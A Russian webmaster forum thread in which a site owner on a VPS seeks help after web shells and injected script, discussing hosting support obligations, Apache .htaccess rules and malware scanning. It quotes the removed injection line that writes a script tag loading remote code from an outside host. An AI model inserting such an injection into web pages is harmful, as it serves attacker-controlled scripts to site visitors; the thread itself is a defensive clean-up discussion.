Форум Сайтостроение Безопасность

Помогите проблема с безопасностью <!-- js-tools -->

egorka-I
На сайте с 27.10.2012
Offline
96
egorka-I
1153

Помогите проблема с безопасностью <!-- js-tools -->

Наш хостинг с меня хотит брать оплату по техподдержке, дожили до этого.

Вот что они пишут:

мы понимаем, что у вас проблема.

Видим, что сервер доступен по ssh, пинг есть, без потерь. Следовательно, проблема внутри вашего контейнера. Согласно регламенту (http://firstwiki.ru/index.php/Регламент_работы_службы_технической_поддержки) если вам нужна помощь наших специалистов, то вам необходимо заказать пакет поддержки.

root@m:~# ping XX.XX.XXX.XXX

PING XX.XX.XXX.XXX (XX.XX.XXX.XXX) 56(84) bytes of data.

64 bytes from XX.XX.XXX.XXX: icmp_req=1 ttl=61 time=0.747 ms

64 bytes from XX.XX.XXX.XXX: icmp_req=2 ttl=61 time=1.17 ms

64 bytes from XX.XX.XXX.XXX: icmp_req=3 ttl=61 time=2.28 ms

64 bytes from XX.XX.XXX.XXX: icmp_req=4 ttl=61 time=0.430 ms

64 bytes from XX.XX.XXX.XXX: icmp_req=5 ttl=61 time=0.515 ms

^C

--- XX.XX.XXX.XXX ping statistics ---

5 packets transmitted, 5 received, 0% packet loss, time 4001ms

rtt min/avg/max/mdev = 0.430/1.030/2.281/0.677 ms

IP здесь скрыл XX.XX.XXX.XXX по понятной причине.

Вчера чистил сайт от шелов, всё вычистил, но проблема может возникнуть снова.

Это было вчера:

<!-- js-tools -->

document.write('<script src="http://sait.ru/i/stat.php"></script>');

<!-- /js-tools -->

Я их спросил сегодня, чуток раньше, они это не захотели смотреть, указав на оплату:

И еще не работает правило:

<Files "xxxxxxxxxx.js">

Order Deny,Allow

Deny from all

</Files>

Видимо в главном конфиге Апача нет:

<Directory />

Options Indexes FollowSymLinks

AllowOverride All

Order deny,allow

Satisfy all

</Directory>

Что мне можно сделать самому???

Andreyka
На сайте с 19.02.2005
Offline
822
Andreyka
#1

Закрыть дыры, через которые льют шеллы

Не стоит плодить сущности без необходимости
egorka-I
На сайте с 27.10.2012
Offline
96
egorka-I
#2
Andreyka:
Закрыть дыры, через которые льют шеллы

Для этого и создал пост).

В соседней ветке написано: "3. все директории, в которые производится загрузка файлов или кэширование - делаем read-write и кладем в них волшебный .htaccess, который либо делает deny from all

либо запрещает вызов php"

Но у меня не срабатывает .htaccess поскольку нет доступа для настройки в апаче.

Права ли техподдержка, и что я сам смогу сделать еще?

Хакеры активно эксплуатируют уязвимость Секреты индексации динамических страниц Telegram начал использовать CDN-сеть
egorka-I
На сайте с 27.10.2012
Offline
96
egorka-I
#3

Тихо... кто-то скажет должен я платить хостеру за эту настройку апача?

Garin33
На сайте с 31.08.2009
Offline
169
Garin33
#4

firstvds.ru вам предоставляет услугу VPS-хостинга. Вот VPS-контейнер вам дали, вся настройка внутри сервера - это уже ваши дела.

Вы можете настроить все сами (если умеете), можете заказать услуги стороннего админа, чтобы он вам все настроил, а можете оплатить работу саппорта firstvds.ru.

Бесплатно никто вам ничего не обязан настраивать, это не шаред.

Потому что Drupal - это круто.
Вышел клиент Яндекс.Диска для REG.RU запускает бета-тестирование сервиса Яндекс приобрёл сервис онлайн-бронирования
egorka-I
На сайте с 27.10.2012
Offline
96
egorka-I
#5

У меня VDS-Отрыв. В каких папках-файлах лежат настройки сервера разобрался, например, знаю адреса файлов: php.ini, httpd.conf могу сам их отредактировать.

У меня другой вопрос будет.

1. Права изменил файла скрипта на 644.

2. Теперь хочу закрыть его, чтоб не был доступен, закинув в его папку .htaccess

<Files "slider-n.js">

Order Deny,Allow

Deny from all

</Files>

3. Чтоб сработал в этой папке .htaccess необходимо мне отредактировать файл httpd.conf

в нём сейчас так:

<Directory />

AllowOverride None

Order deny,allow

Deny from all

</Directory>

заменить на:

<Directory />

Options Indexes FollowSymLinks

AllowOverride All

Order deny,allow

Satisfy all

</Directory>

Тем самым закроется возможность внедрения в файл скрипта постороннего кода шела.

А теперь вопрос: правильна ли последовательность шагов и будет ли результат?

Поправьте если я неверно понимаю.

Вопросы про DMonitor от IHC.RU - Качественный хостинг, Помогите разобраться с реврайтом
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#6

ТС почему вы мучаете конфиги сервера, а не хотите дыру с движке закрыть?

P.S. техподдержка правильно ответила, на ВПС администрированием занимается владелец, либо нанятый за отдельную админ.

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
egorka-I
На сайте с 27.10.2012
Offline
96
egorka-I
#7

У меня нет движка, самописные сайты. И я знаю какие именные файлы *.js у меня заражаются.

А еще, нашел в соседней теме и поставил права на папку 555.

K5
На сайте с 21.07.2010
Offline
209
kgtu5
#8

от шеллов 555 не спасет, их вычистили ?

уверены что после того как закроете запись в .js, вам не начнут спамить в .php ??

egorka-I
На сайте с 27.10.2012
Offline
96
egorka-I
#9

Код я вычистил:

<!-- js-tools -->

document.write('<script src="http://sait.ru/i/stat.php"></script>');

<!-- /js-tools -->

а что-то подозрительное другое не нашел...

Скачан весь хостинг на комп, как еще искать подозрительные файлы?

Спамить в .php - не знаю может быть...

Пароли от FTP сверхдлинные, пароль стоит главный в тотале, думаю здесь нет утечки.

Вирус document.write Не заходит на трекер Скрипт не работает в
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#10
как еще искать подозрительные файлы

ай-болитом например

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий